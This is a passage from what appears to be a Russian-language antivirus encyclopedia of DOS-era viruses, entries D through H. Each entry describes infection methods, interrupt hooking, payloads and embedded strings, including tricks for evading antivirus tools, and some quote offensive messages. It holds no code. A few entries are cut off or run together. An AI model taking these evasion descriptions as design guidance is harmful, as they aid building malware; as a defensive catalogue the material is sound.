Неопасный резидентный вирус. Заражает EXE и SYS-файлы. Для EXE-файлов является полиморфным вирусом. При старте инфицированного EXE-файла, вирус производит поиск в файле C:\CONFIG.SYS текстовых строк "DEVICE". При нахождении такой строки вирус пытается заразить файл (если он в формате SYS), указанный через данную переменную "DEVICE". Вирус создает файл C:\devices.$$$, записывает в него 2000 байт своего кода, затем записывает содержимое оригинального SYS-файла, удаляет SYS-файл-жертву и присваивает файлу C:\devices.$$$ имя данного файла. При загрузке такого инфицированного SYS-файла вирус "перехватывает" INT 1Ch(таймер). При определенных обращениях к таймеру вирус проверяет есть ли обращение к флоппи-дискам (включен ли мотор дисководов) и пытается найти и заразить EXE-файлы.

DieLamer.1090

Опасный резидентный вирус. Уничтожает файлы smartc*.cps и chklist.*. Если идет вывод строки "-=*@DIE_LAMER@*=-" через INT 10h, то вирус уничтожает содержимое секторов диска B:. Содержит строку "VLamiX-1".

Digger.1475 (1,2), 1512, 1800

Оставляют в памяти резидентную программу, которая переворачивает экран. Содержат строку "© DIGGER".

Digital.3547

Опасный резидентный полиморфный вирус. 28 мая уничтожает содержимое секторов на 32 головках 20 дорожках первого жесткого диска, записывая в данные сектора повторяющуюся строку "DIGI",после чего перепрограммирует знакогенератор, проигрывает мелодию и выводит текст.

Dima.325

Содержит текст "Dima".

Dinamo

Если в процессе загрузки с инфицированного диска произойдет ошибка чтения, то вирус выводит на экран фразу "Dinamo(Kiev)-champion !!!".

Dir-II (1-7)

Неопасные (Dir-II (5) - опасен ) резидентные вирусы, встраивающиеся в цепочку дисковых драйверов. Записывают свой код в последний кластер диска. Для файлов с расширениями COM и EXE устанавливают указатели первого кластера данных на данный последний кластер диска, содержащий вирусный код. Dir-II (5) уменьшает длину файлов с расширением DBF на 256 байт и удаляет файлы, начинающиеся на AIDS или ADIN.

Dmr.1200 (1,2)

Неопасные резидентные вирусы. 13 числа выводят на экран тексты:
DMR, Pantera & Ale Forever !
D M R F o r e v e r !
Dis iz ChaosTraveller ver. 2.0
Nightmare, yeah ? Try to be clean !
Suck off, fucksider ! Today`s 13th !
Virus "CHAOS TRAVELLER".
Made by MegaMind,Murmansk,RUSSIA,1996.
This is only test.Prepare for my next virus.
I will turn you life into nightmare !
Ha-ha-ha-ha-ha-ha-ha-ha !!!

Dnepr.377

Неопасный резидентный вирус. Периодически выводит на экран текст "DNEPR-CHAMPION".

Dodgy

Опасный загрузочный стелс-вирус. Перехватывает INT 13h, 21h, 2Fh, 40h. Удаляет файл SYSTEM\IOSUBSYS\HSFLOP.PDR. 28 числа может уничтожить содержимое секторов дискет и вывести текст "RAVage is wiping data! RP&muRphy".

Donbass.444

Неопасный нерезидентный вирус. Первым делом пытается заразить командный процессор, указанный через переменную среды COMSPEC. Содержит текст "Donbass3".

Doom.666

Неопасный резидентный вирус. Содержит текст: DOOM2.EXE Illegal DOOM II signature Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2 Say bye-bye HD The programmer of DOOM II DEATH is in no way affiliated with ID software. ID software is in no way affiliated with DOOM II DEATH.

Doom.752

Очень опасный нерезидентный вирус. 8 числа любого месяца пытается уничтожить 320 секторов дисков C: и D:, после чего выводит сообщение:
DOOM I. Greetings from National Central University !

DotEater.944 (1-3)

Неопасные резидентные вирусы. Первым делом пытаются заразить командный процессор, указанный через переменную COMSPEC. Могут оставить в памяти резидентный код "на клавиатуре INT 16H", который в зависимости от нажимаемых клавиш "запускает" по 25 строке экрана "рожицу", ASCII символ - 1. "Рожица" во время своего движения "издает" жужжание.

Dotter.3961, 4611

Неопасные резидентные шифрованные вирусы. Иногда могут вывести на экран одно из приведенных ниже высказываний:
"Не богатей дуpными сpедствами" (Фалес).
"Чем поддежал ты своих родителей, такого жди и от детей" (Фалес).
"Заводи друзей не спеша, а заведши, не бросай" (Солон).
"Не злословь о ближнем, чтобы не услышать такого, чему сам не порадуешься" (Хилон из Спарты).
"Что лучше всего? Хорошо делать, что делаешь" (Питтак)
"Только больная душа может быть глуха к чужой беде" (Бинат).
"Цивилизация - это совокупность духовных, материальных и нравственных средств, которыми данное сообщество вооружает своего члена в его противостоянии внешнему миру" (М.Барг).
"Если для создания социализма требуется определенный уровень культуры... то почему нам нельзя начать сначала с завоевания революционным путем предпосылок для этого определенного уровня, а потом уже, на основе рабоче-крестьянской власти и советского строя, двинуться догонять другие народы" (В.Ленин).
"Пришло несчастье - человек сам его породил, пришло счастье - человек сам его вырастил. У несчастья и счастья одни двери, польза и вред - соседи" (Конфуций).
"Мир - это священный сосуд, которым незьзя манипулировать. Если кто хочет манипулировать им, уничтожит его" (Дао) .
Запад есть Запад, Восток есть Восток, не встретиться им никогда.
Лишь у подножья Престола Божья в день Страшного Суда. (Р.Киплинг)
"Кто покупает ненужное, тот скоро продаст необходимое" (Б.Франклин).
"Помните, что время - это деньги" (Б.Франклин).
"Следуй pеке, начиная с ее истоков. Истина сегодня-завтpа окажется ложью" (Ф.Паулюс).
"За ошибки госудаpственных деятелей pасплачивается вся нация" (Н.Беpдяев).
Весь мир - театр.
А в нем женщины, мужчины - все актеры.
У них есть выходы, уходы.
И каждый не одну играет роль.
Семь действий в пьессе той.
Младенец, школьник,юноша, любовник,
Солдат, судья, старик. (Шекспир)
- "Человеческое достоинство нерушимо.Уважать и защищать его - обязанность всякой государственной власти" (Конституция ФРГ, ст. # 1)
- "Государственная власть основывается на непоколебимим доверии народа, ее авторитет исходит от народа, ее полномочия осуществляются посредством народа, а благами ее пользуется народ" (из Конституции Японии)
- "Вся власть в СССР принадлежит народу" (Конституция СССР 1977 г., ст. 2)
"Неча на зеркало пенять, коль рожа крива" (про тебя)

Dracula.1370

Очень опасный резидентный вирус. При старте инфицированного файла, вирус удаляет свой код из него. При значении минут системного времени кратного 10 и при возникновении ошибки во время самостоятельного "излечения" файлов, вирус уничтожает содержимое первого жесткого диска и выводит текст "It's a pleasure for me to be so harmful. See you later, Count DRACULA.".

Dragon

Неопасный загрузочный стелс-вирус. При трассировке резидентной копии вируса, происходит "зависание" системы и возможна в этот момент "рябь" на экране монитора.

DrDemon.4292

Неопасный файлово-загрузочный полиморфный вирус. Не заражает файлы, начинающиеся на буквосочетания AIDS, WEB, VB, ADINF, SCAN, CLEAN, DRW. Содержит зашифрованный текст "MB Pro © 1994-96 by Dr.Demon".

Drdr.1141

Опасный нерезидентный вирус. Оставляет в памяти резидентный код, который уменьшает размер свободной DOS-памяти. Содержит текст "Dr&dR © SizOrtSoft L.T.D. 10-10-93".

Dre.192

Опасный замещающий программный код вирус. Заражает EXE-файлы в текущем каталоге, записываясь в их начало. Содержит тексты "Я вирус?EXE" и "Wr. by Doctor Dre 1997©.King V1.2".

Dre.756

Опасный нерезидентный шифрованный вирус. Заражает COM и EXE-файлы в текущем каталоге. Причем EXE-файлы Dre.756 заражает вирусом Dre.192, которого носит в своем теле.

Dream

Неопасный загрузочный стелс-вирус. Копирует 101 байт своего кода в таблицу векторов прерываний. При чтении первых секторов дискет вирус читает в область видеопамяти инфицированный MBR жесткого диска и записывает его в загрузочный сектор флоппи-диска. Содержит строку "dream".

DREG.based

Данные вирусы сконструированы с помощью вирусного конструктора DREG (Digital Hacker's Alliance Randomized Encryption Generator), позволяющего создавать нерезидентные полиморфные вирусы, заражающие COM-файлы в текущем каталоге.

Dret.1710

Очень опасный резидентный полиморфный вирус. 13 числа или при неаккуратной трассировке вирус может уничтожить по 128 секторов на первом и втором жестких дисках. Содержит текст
"© 23.5.3945 / DR & ETASCECLHVSPF-ACPRVINWI".

DrJohn.2000

Неопасный резидентный вирус. На следующий месяц после заражения выводит на экран текст "Пpивет от *Doctor John*! Пpиятель, да ты оказывается чайник последний !". Имеет текст "Данные из заголовка EXE".

Dron.995, Dron.1024

Содержат текстовую строку "* DRON Ver 1.00, PhysTech,© 1994 *". Иногда выводят на экран текст:
Moscow Institute of Physics and Technology © 1994

DrWhite.1027

Файлово-загрузочный шифрованный вирус. При старте инфицированного файла вирус заражает MBR, изменяя 34 его байта. Записывает на диск еще 2 сектора своего тела. При перезагрузке системы инсталлируется в память и перехватывает INT 13h, INT 1Ch, INT 21h. В дальнейшем заражает Boot-сектора флоппи-дисков и COM-файлы. Содержит текстовые строки: "Dr White - Sweden 1994" и "Junkie Virus - Written in Malmo...M01D".

DrWhite.2403

Опасный резидентный полиморфный вирус. Уничтожает файлы CHKLIST.MS. Содержит текстовые строки: "DrW-2", "Dr White - Sweden 1993" и "Desperado Virus - Written in Malmo...F02E".

DSCE-вирусы

DSCE (Dark Slayer Confusion Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан китайским вирусописателем по "кличке" Dark Slayer.

DSME-вирусы

DSME (Dark Slayer Mutation Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Создан китайским вирусописателем по "кличке" Dark Slayer.

DSME.Connie.1761, DSME.Connie.2708

Полиморфики. Первым делом пытаются заразить файл COMMAND.COM в корневом директории диска C:. Содержат текстовые строки:
DSME.Connie.1761 - "This is Written by Dark Slayer in
Keelung TAIWAN".
DSME.Connie.2708 - "This is Connie v2.0 Written by Dark Slayer in
Keelung, Taiwan".

Dsu.1414

Опасный зашифрованный вирус. После 25 числа месяца перехватывает INT 17h (принтер) и при выводе на печать меняет русскую букву 'р' на 'г'. Содержит текст "© 1994 DSU RadioFuck".

Dumb.4722

Неопасный резидентный полиморфный вирус. После 6500 нажатий на клавиши вирус выводит текст:
I'm the first version of the first Romanian Polimorphic Virus.
Because I was borned in Romania, all the talking from now-on
will be in my language.
--DECI-- sa ne intelegem romaneste ca de la virus la posesor de virus :
Ma lasi sa traiesc linistit, te las sa traiesti linistit !
De acord ? "DWBoMK" МИСиС,ПМП,ТЭМ-96-1" и уничтожает содержимое первого
жесткого диска.

F

Fab.1755

Неопасный резидентный вирус. Упакован LZEXE. Резидентная копия вируса "хранит" в памяти и свою нераспакованную копию. При заражении EXE- файлов вирус создает файл $$$$$$$$, в который записывает свою копию, упакованную LZEXE, а затем дописывает и весь файл-жертву. Оригинальный файл удаляется, а файлу $$$$$$$$,содержащему копию вируса присваивается имя оригинального файла. При невозможности открыть файл, из которого стартовал вирус, для считывания в память кода программы, вирус выводит текст "Error in EXE file". Содержит строку "*FAB*".

Face.414

Размещает свою TRS-копию в область памяти, содержащую 414 повторяющихся нулевых байт. Перехватывает INT 21h и заражает файлы при их создании. Иногда изменяет в выводимом на экран тексте некоторые символы на символ с кодом ASCII 01 ().

Face.2521

Неопасный резидентный вирус, заражающий COM, EXE и SYS-файлы. При первом запуске инфицированного COM или EXE-файла, вирус производит поиск на текущем диске файла CONFIG.SYS. Если данный файл найден, то вирус ищет в данном файле первый загружаемый файл с расширением SYS и заражает этот файл, если он еще не инфицирован. После чего вирус отдает управление программе - вирусоносителю. При загрузке в память инфицированного SYS-файла, вирус размещает свою копию в памяти и перехватывает INT 21h. При запуске COM и EXE-файлов вирус заражает их. Иногда вирус стирает текстовую строку "бегущим" символом ASCII 01 (). Содержит строки "COMMAND.COMEXECOMSPEC=C:\CONFIG.SYS DEVICE".

Fafb.948

Неопасный резидентный вирус. После установки в память своей резидентной копии, вирус самостоятельно "излечивает" своего файла-хозяина на диске, запускает его (f.4B00h Int 21h), после чего пытается еще заразить *.COM и *.EXE-файлы в каталогах, доступных через переменную PATH.

Fair.2083 (1,2), 2340

Неопасные резидентные шифрованные вирусы. Fair.2083, при старте какой- то программы, (вирусы проверяют заголовок файла) выдают сообщение:
This is an [ illegal copy ] of KeyPress virus remover
System Halted
Fair.2340 иногда печатают на экране текст "Time Machine, Running.".
Fair.2083 содержат также строку "Eternal Fair".

Fanthomas.1443

Неопасный файлово-загрузочный вирус. Инфицированные EXE-файлы заражают MBR жесткого диска, а инфицированные COM-файлы устанавливают в память резидентную копию и "перехватывают" INT 13h, 21h. 21 июля вирус "перегружает" систему. Содержит текст "-=ЁFANTHOMAS vir. 1.0ч© SzczecinekчDla Izy W. z BestwinyЁ=-".

Fantomas.432

Очень опасный резидентный вирус. В нечетные месяцы уничтожает первые 16 секторов логических дисков D:, E:, F: и выводит текст "FANTOMAS".

Farside.3008

Неопасный резидентный вирус. Иногда, а также 6 апреля выводит текст:
For cryin'out loud! My circuits are haunted by the ghost of a porcupine. . .
Содержит также строку "FARSIDE virus 1.00 © Windom Earle ROMANIA".

Fascist.442

Заражает *.COM файлы, производя поиск их на всех доступных устройствах жесткого диска в текущих каталогах. С ноября выводит в графическом видеорежиме изображение российского флага, знака "=" и фашистской свастики.

Favour.2576, 2608

Очень опасные резидентные стелс-вирусы. Favour.2608 после 8 июля 1995 года изменяет в некоторых EXE-файлах сигнатуру 'MZ' на нули; иногда "гасит" экран; содержит текстовую строку "FAVOUR". Favour.2576 начиная с июля 1995 года, если значение секунд системного времени больше 10, при закрытии файлов (не в формате EXE), файловый манипулятор (file handler) которых имеет значение больше, чем 5, вирус уничтожает 4 первых байта данных файлов. Иногда может вызывать печать экрана на принтер (Int 5 Print Screen). Содержит зашифрованное слово "KVITOK".

FaXFree.Abstract

Неопасный резидентный вирус. Содержит текст "MOSQUITO DOS 7.00 NODOSACT SPECIAL THANKS TO MAXCC ©91-92 rel.2soon ABSTRACTSPACE P. 0.98 Rev 4 24IX89 bye bye Copy at your own risk".

FaXFree.Fam

Опасный резидентный вирус. Может записать в загрузочный сектор текущего диска троянский код. Иногда выводит текст:
Umb ho utilizzato solo il virwork di DarkOver bye bye
Fago_T2 new name 2/4/92
Также содержит тексты:
Work Area stopHello this is the core Rev 5 5/17/91 P 1c
Fago_T2 data add 0022 year 0025
Fago_T2 count add 0027 cs 002b
FAM Associates. Kill with us F.A. from PE, Italy. Help us!

Fellow.1019

Неопасный резидентный вирус. В сентябре при старте любой программы выводит текст:
This message is dedicated to
all fellow PC users on Earth
Towards A Better Tomorrow
And A Better Place To Live In

Fence.2089

Неопасный резидентный шифрованный вирус. После 10000 нажатий на клавиши может проиграть мелодию и в это время изменять строчные буквы на прописные на экране монитора.

FFC.1000

Неопасный резидентный шифрованный вирус. Иногда помещает в служебную ячейку памяти клавиатуры 0040:001Ah значение 0FFh.

Ffff.432

Опасный резидентный вирус. 13 сентября уничтожает 13 секторов диска C:.

FifteenYears (1,2)

Опасные загрузочные шифрованные вирусы. 7 апреля вирусы уничтожают содержимое секторов дисков, записывая в них текст "Esto te pasa por programas que a nosotros nos cuesta tanto trabajo hacer. Que te quede de Experiencia, MВxico,1994". Также содержат текст "This Virus is from MEXICO, I have 15 years old".

Filler (1-3)

Опасные загрузочные стелс - вирусы. При заражении флоппи - дисков форматируют дополнительную дорожку, на которую записывают свой код и оригинальный загрузочный сектор.При запуске COMMAND.COM,вирусы копируют свои резидентные копии в область "нижних" адресов памяти. Могут вывести на экран текст:
Haha,vбrus van a gВpben!!
Ez egy eddig mВg nem kФzismert vбrus. De hamarosan az lesz.
A neve egyszerБen tФltФgetФ
Ezt a nevВt onnan kapta, hogy feltФltФgeti a FAT-tаblаt
kФlФnbФzФ alakzatokkal.
Ez mаr meg is tФrtВnt !!!

Find.229, 512, 600, Find.BigX

Неопасные резидентные вирусы. Заражают файлы при вызове функций FindFirst, FindNext (f.11h,12h,4Eh,4Fh INT 21h). Find.BigX не заражает файлы, начинающиеся на SC или AI. Он содержит строку [BigX].

FinnPoly.2179

Опасный резидентный полиморфный вирус. По возможности устанавливает свою резидентную копию в область UMB. Создает расшифровщик вирусного кода в области программного кода, после чего передает ему управление с помощью команды CALL SP. Данная команда некорректно работает на компьютерах с процессором i386. Вирус размножаться на таких компьютерах не сможет, и скорее всего, "завесит" систему. Вирус удаляет файлы: ANTI-VIR.DAT, AV.CRC, AVP.CRC, CHKLIST.CPS, CHKLIST.MS, MSAV.CHK. Если значение дня равно значению месяца, то вирус выводит текст:

First.343

Неопасный резидентный вирус. Содержит текст "First 1.1 Copyright © 1997 DataLife+ Corp.".

First.3032, 3173

Неопасные резидентные вирусы. "Перехватывают" INT 9,13h, 1Ch, 21h, 28h. Выводят на экран мелькающую строку "1st".

Fish#6 (1-5)

Резидентные опасные шифрованные стелс-вирусы. Шифруют свой код не только в файлах, но и в памяти, используя некоторые антиотладочные приемы. Fish#6 (2), при совпадении значения текущего дня со значением месяца, уничтожает содержимое жесткого диска. С 1991 года вирусы при старте выводят сообщение:
FISH VIRUS #6 - EACH DIFF - BONN 2/90"
и "вешают" систему. Содержат также тексты "COD", "SHARK", "CARP", "BASS", "TROUT", "MUSKYZ", "SOLE", "PIKE", "MACKEREL", "FISH", "TUNA", "FISH FI","Don't trouble trouble until trouble troubles you.","©Fly".

Fisher.1100, 2420

Резидентные вирусы. Fisher.2420 - опасен, при выводе на печать, данный вирус выводит после знаков препинаний нецензурные словечки. Fisher.1100 может вывести текст "© Copyright 1992 by Fisher. Version 3.0 . PUNK- ROCK & BEER FOREVER !". Fisher.2420 содержит текст "© Copyright 1991- 92 by Fisher. Version 2.0 .Идея эффектов на принтере - ДАС-2, комната 1405 .".

Flagyll.316, 369

Очень опасные резидентные вирусы. Записывают свой код в начало EXE- файлов, не сохраняя программный код. Содержат текстовые строки "-=[Crypt Newsletter 13]=-", "Flagyll".

Flame (1-3)

Опасные Boot-вирусы. Оригинальный MBR не сохраняют, на дискетах Boot- сектор сохраняет по адресу: головка-1, цилиндр-25, сектор-1, уничтожая данные в данном секторе. Иногда рисуют на экране картинку похожую на пламя.

Flex.491

Неопасный резидентный вирус. 17 числа после 22.00 при нажатии на клавишу "Del" выводит сообщение "Flex-It-Up gal! Time to have sex!". Имеет также строки "Admiral Bailey", "[FLEX]".

Flip.2153, 2343, 2365

Неопасные файлово-загрузочные полиморфные вирусы. Заражают MBR жесткого диска и COM, EXE-файлы. 2 числа месяца вирус "переворачивает" экран. Левый верхний угол экрана оказывается в правом нижнем углу. Flip.2343, 2365 производят поиск в каждом инфицируемом файле последовательности команд:
MOV DX,Data1
MOV Data2,DX
MOV DX,Data3
MOV Data4,DX
и изменяют их на вызов INT 9Fh (CD 9F). Данная последовательность команд используется в командном процессоре COMMAND.COM при выводе на экран результатов длин файлов после поиска файлов (функции (FindFirst, FindNext). Вирусы "перехватывают" INT 9Fh и при вызове данного прерывания уменьшают полученное значение длины файла на величину вирусного кода. Содержат текст "OMICRON by PsychoBlast".

Floyd.1542

Неопасный резидентный шифрованный вирус. Иногда выводит сообщение:
Now life devalues day by day, as friends and neighbours turn away,
And there's a change, that even with regret, cannot be undone...
PiNK FLOYD, The Division Bell.
MCH' 97
[Any Key]
Также содержит строки "FLOYD ViRUS v.1.01.095", "MCH".

Folks.618

Неопасный резидентный вирус. Не инсталлируется в память если текущий каталог содержит подкаталог \LAN. В 0.00, 3.00, 6.00 и 9.00 выводит текст "THAT'S ALL, FOLKS !".

Forever.896

Не заражает программу AIDSTEST. Содержит строки "No WINDOWS, MS-DOS forever...", "Excuse Me, please...".

Forever.930

Не заражает программы AIDSTEST.EXE и ADINF.EXE. Содержит зашифрованный текст "No WINDOWS, MS-DOS forever...".

Form (1-4)

Опасные вирусы. Могут уничтожить данные на жестком диске. Содержат строку "The FORM-Virus sends greetings to everyone who's reading this text. FORM doesn't destroy data! Don't panic! Fuckings go to Corinne.".

Frankenstein

Очень опасный загрузочный вирус. Заражает MBR всех жестких дисков, установленных в компьютере. "Перехватывает" INT 8, 12h, 13h. Может уничтожить содержимое секторов жестких дисков.

Freddy.1663

Опасный зашифрованный нерезидентный вирус. Может удалить файлы с расширениями, отличными от COM, EXE, SYS. Содержит текст:
FREDDY_SOFT
jln lobilobi blok Q27 Kalibata indah JAKARTA Selatan
Greetings to STACK RIPPER, DOUBLE CLICK, SINGLE DRIVE
COMEXESYSAUTOEXEC.BATIBMBIO.COMIBMDOS.COM

Freddy.1870

Очень опасный резидентный вирус. Заражает файл COMMAND.COM по алгоритму вируса Lehigh, т.е., длина COMMAND.COM не изменяется. Может затереть сектора диска строкой "Freddy Krg".

Freddy.2271

Опасный полиморфный резидентный вирус. Иногда при записи в файлы (f.40h INT 21h) изменяет случайный байт. Содержит текстовые строки "Fridrik!" и "Freddy KRueGer 2.1".

Freedom.2448, 2560, 3600

Очень опасные резидентные зашифрованные вирусы. При обнаружении слов "воен", "арми", "солдат", "оруж", "военком", "полковник", "призывн", "вооружен" вирус уничтожает случайные сектора на жестком диске (Freedom.2560, 3600) или все сектора (Freedom.2448), записывая в них фразу "Закон о всеобщей воинской обязанности - ГРУБЕЙШЕЕ НАРУШЕНИЕ прав Человека !". Содержат тексты "COMMAND AIDS .EXE .COM", "F R E E D O M", "ПОМНИТЕ - УНИЧТОЖИВ ЭТУ ПРОГРАММУ ИЛИ ЕЕ СОЗДАТЕЛЯ, ВЫ УНИЧТОЖИТЕ СЛЕДСТВИЕ, НО НЕ ПРИЧИНУ ..."

Fricker.395

Неопасный нерезидентный вирус. В девятом часу утра выводит на экран текст "FRICKER-1 is glad to meet YOU!".

Frodo.4096 (1,2)

Опасные резидентные стелс-вирусы. После 21 сентября должны записывать в MBR код.

Fsmm.2971

Опасный резидентный полиморфный вирус. Внедряет вирусный код сразу за заголовком EXE-файла,зашифровав и переместив предварительно программный код в конец файла. Из-за ошибки в вирусе некоторые инфицированные файлы восстановлению не подлежат. Такие файлы при старте, как правило, "вешают" систему. Вирус содержит текст "Fire/Space version 1.0, from Новгоpод, with FSMM v1.0(Fire/Space Mutant Machine)".

Fumble.867

Опасный нерезидентный вирус. Оставляет в памяти резидентный код "на INT 16h", который подменяет некоторые символы, вводимые с клавиатуры. Содержит строку "V1".

Funky.692

Неопасный резидентный вирус. Ищет в COM-файлах последовательность 692ух повторяющихся байт и если находит ее, то внедряет свой код в данное место файла. Если данной последовательности нет, то вирус заражает файл стандартным способом. При нажатии на Ctrl-Alt-Del издает некоторые музыкальные звуки.

Future.3180

Неопасный резидентный вирус. Заражает COMMAND.COM и файлы на флоппи- дисках. Содержит зашифрованные тексты:
COMSPEC=C:\COMMAND.COM command.com \ARJ. .COM .com .EXE .exe \AIN. \ain. \RAR. \MSAV. C:\COMMAND.COM Terminator Model 1.3 *Future Virus*

Fy.338

Неопасный нерезидентный вирус. Если вирус не находит *.COM-файлы для заражения, то он пытается положить в буфер клавиатуры нецензурное выражение на английском языке "F... YOU".

Fynov.4309

Опасный резидентный шифрованный вирус. Иногда выводит на весь экран при некоторых ошибках английское нецензурное выражение.При старте программы *ST (AIDSTEST) иногда выводит текст "No viruses". ПРи старте программы *BO (?) "перехватывает" INT 17h и может при выводе на принтер вставить уже русское непотребное слово. Иногда игнорирует нажатие на клавиши.

H

Ha.798

Очень опасный нерезидентный замещающий программный код вирус. В субботу пытается отформатировать 45 начальных цилиндров первого жесткого диска. Иногда выводит сообщение:
HA! HA! HA!
Your computer is infected now by the
most likely and non-dangerous virus!
Please enjoy it!
Your MBR may now be corrupted...
и уничтожает содержимое MBR. По окончании своей работы выводит текст:
General error reading drive C: Abort, Retry, Ignore, Fail?

Haharin

Опасный загрузочный вирус. Не сохраняет оригинальный сектор при заражении флоппи-дисков. После 256 загрузок с жесткого диска уничтожает содержимое первого жесткого диска и выводит на экран текст: "Haharin is not dead !".

Halfive.512

Опасный файлово-загрузочный вирус. Блокирует удаление файлов. Содержит текст "ONE_HALF35/7".

Harlot.738, 5632 (1-4)

Harlot.5632 (1-4) - опасные резидентные вирусы. "Сбивают" системное время. Периодически выводят в рамке случайное сообщение (см. SGWW.Nostardamus.5995) и ждут нажатия на клавишу "пробел". Иногда выводят еще одно сообщение:
Вирус HARDY HARLOT v1.06 by CRAZY
Киев , КИИГА ФАРЭО 101 ,20.05.94
CRAZY подружись со мной. ФАВТ 2..
Исправлено: файлов - 25
Virus segment - 9E5F
Harlot.738 содержит текст:
Hello ! I'm virus Hardy-Harlot !
Don't hurt me ,please . v1.03

Harmless.1082

Опасный резидентный, частично зашифрованный, вирус. Портит при заражении EXE-файлы, имеющие внутренние оверлеи. Содержит тексты "Eat me Lozinsky!", "Harmless v1.0, 10/06/92 Tyumen".

HarmWare.3516, 3716

Опасные резидентные полиморфные вирусы. При заражении файлов вирусы не изменяют их длину.При внедрении в файл вирусы производят анализ данного файла с целью выяснения возможности его упаковки достаточно простым алгоритмом сжатия, используемым данными вирусами. После чего вирусы сжимают программный код и записывают свой код в начало файла. В EXE- файлы вирусы могут внедрить код, который производит настройку адресов перемещаемых элементов, при этом количество этих элементов в заголовке EXE-файла обнуляется. Вирусы содержат анти-отладочные приемы. При неаккуратной трассировке могут уничтожить содержимое секторов жесткого диска. Периодически, если не было нажатий на клавиши, вирусы производят "вращение экрана".При открытии таблиц ревизора ADinf, вирусы возвращают ошибку открытия файла-таблицы. А также пытаются обмануть ADinf всевозможными манипуляциями: сохранением в видеопамяти текущей страницы экрана и последующим ее восстановлением, подсовыванием в буфер клавиатуры скан-кода клавиши Enter и др. Но это происходит только в том случае, если на экране в этот момент присутствуют строки "ADinf", allocation error!
Bad command or file name
Cannot load COMMAND.COM . . .
Internal stack overflow!
Incorrect DOS version
This program requires Microsoft Windows.
и блокирует запуск данных программ. Иногда (если командная строка начинается с параметра @@) может вывести сообщение:
© 1996y by TechnoRat "HDL" GenNo: 000122.
где параметр "GenNo" является счетчиком заражений. До меня дошел 122 инфицированный файл. Содержит тексты:
?VirMON-I-Virus has been installed successfully!
?VirMON-W-execution 0 error!
©reated by HARD WISDOM!!! (hacker)

Harrier.14058

Опасный резидентный полиморфный вирус. Вирус состоит из сплошных команд переходов, которые идут после 1-10 "рабочих вирусных" инструкций. Т.о., последовательно выполняющиеся вирусные инструкции разбросаны по всему телу вируса и передают друг другу управление с помощью инструкций безусловных переходов. Таким стилем программирования автор, видимо, хотел показать "глубину" своего таланта.Вирус записывает в MBR жесткого диска код. При старте программы DRWEB вирус разрушает ее,записывая в нее процедуру вывода сообщения "Lame program MUST DIE!!!".Блокирует вывод на принтер, печатая текст "VIRLIST.WEB is Sucks!!!". Также, в некоторых других ситуациях вирус выводит на экран тексты:
This program requires Melcosoft Windows.
?VirMON-I-Virus has been installed successfully!
Division by zero!
IBMBIO<> Message added specially for PolyGris.
Program too big to fit in memory
Cannot load COMMAND.COM . . .
ALLE:WP © 1996,1997y by TechnoRat "NextHDL" GenNo: 000008. Release 0
Peripherals not responded!
Memory allocation error!
RAM parity error!
CPU mode thunking error!
Incorrect DOS version
Internal stack overflow!
Error in EXE file
Packed file is corrupt
Power integrity error!
Mad command or file name
I/O gate damaged!
Warning, FPU overcooled!
Low CPU voltage!
A20 moving failure!
DMA channels crosslinked!
?VirMON-W-execution 0 error!
Bad command or file name
Cooler device emergency!
This program requires Microsoft Windows.

HDDError

Опасный загрузочный вирус. При заражении MBR жестких дисков и загрузочных секторов флоппи-дисков не сохраняет оригинальные сектора. "Отрезает" 1 Kb от памяти DOS, но размещает свою резидентную копию во второй половине таблицы векторов прерываний и "перехватывает" INT 40h. Выводит следующие сообщения "FATAL ERROR:", "CPU FAILED.","HDD ERROR.".

HeadMonth.473

Опасный нерезидентный вирус. В 1994 году пытается форматировать первую дорожку жесткого диска на головке, соответствующей значению текущего месяца.

Helicopter.777

Резидентный вирус. Внедряется в середину COM-файлов (определяет формат файла по двум буквам расширения - "OM"). Ищет во всем файле последовательность 777 байт со значением 0, и если такая последовательность будет найдена, то вирус записывает себя в данную область. При установке графического режима изображения 320x200 (f.0005 INT 10h) на экране появляется пролетающий вертолет. Содержит зашифрованный текст "I~m Mashka !! By Crazy !".

HelloUser.402

Неопасный шифрованный вирус. Производит поиск и заражение *.CoM-файлов на диске C:. Содержит текст "*.CoM << Ebbelwoi >> by (Ы)SнRнUS 10-93 D-63225".

HellSpawn.1141

Неопасный резидентный стелс-вирус-спутник. Перехватывает INT 09, 10h, 13h, 1Ch, 21h. При установке 13h графического видеорежима (640x320) рисует в левом верхнем углу экрана что-то похожее на пламя. При нажатии на Ctrl-Alt-Del в центре экрана также выводит нечто похожее на огонь. Содержит текст "HellSpawn v0.91a © 1993 by Stormbringer".

HH&H.4087, 4091, 4093, 4115

Неопасные резидентные шифрованные вирусы. При заражении COM-файла переименовывают их в файл в *.A*, инфицируют его и переименовывают обратно. По понедельникам записывают значение 0 в порт A0h и B0h в порт 41h. При обнаружении на экране строки "ESIK" выводят на экране в графическом видеорежиме скачущий шарик, который заполняет весь экран точками. Содержат один из следующих текстов:
#(-28=CIPV]HARD HIT & HEAVY HATE the HUMANS !! [ H.H.& H.H. the H. ]
#(-28=CIPV]В семье все взвесив заново решили окончательно:КОМПАРТИЮ ЗЮГАНОВА ПОДДЕРЖИМ ОБЯЗАТЕЛЬНО

Hi.460, 802, 892, 895, 924

Неопасные (Hi.802 - опасный) резидентные вирусы. Содержат строку "Hi" или "IH". Hi.802 имеет строку "AOB 3".Hi.895 после 1 октября производит некие музыкальные звуки. Hi.924 периодически "переворачивает" экран. Hi.892 после 23 октября при быстрых перемещениях мыши выводит на экран "NU MAI MUSKA MOUSE-il CA A LOVESTI PESTE COAIE". Hi.802 по воскресеньям блокирует работу с принтером, 10 мая - с последовательными портами, 25 ноября удаляет все запускаемые файлы, по седьмым числам месяца часто перезагружает систему.

Hider.1782

Опасный нерезидентный вирус. Удаляет файлы данных некоторых антивирусов *.MS и *VIR.DAT. 13 числа выводит сообщение:
Anston Rant is back for more! Whoa, looks like you be missin some files there, Bud!
После чего устанавливает всем файлам в корневом директории диска C: атрибут "скрытый" (hidden).

HideNowt.1741 (1,2)

Применяют антитрассировочные приемы. Содержат строку "Yx", которую используют, как идентификатор заражения файлов.

Hinder.380

Резидентный вирус. Имеет текст "Hinder II Ver 2.00 © 1995".

Hiroshima.826

Очень опасный нерезидентный вирус. Заражает файл C:\COMMAND.COM. Периодически уничтожает содержимое "винчестера".

HLL-вирусы.

Вирусы, написанные на языках высокого уровня (High Level Language). Подразделяются на 3 вида:
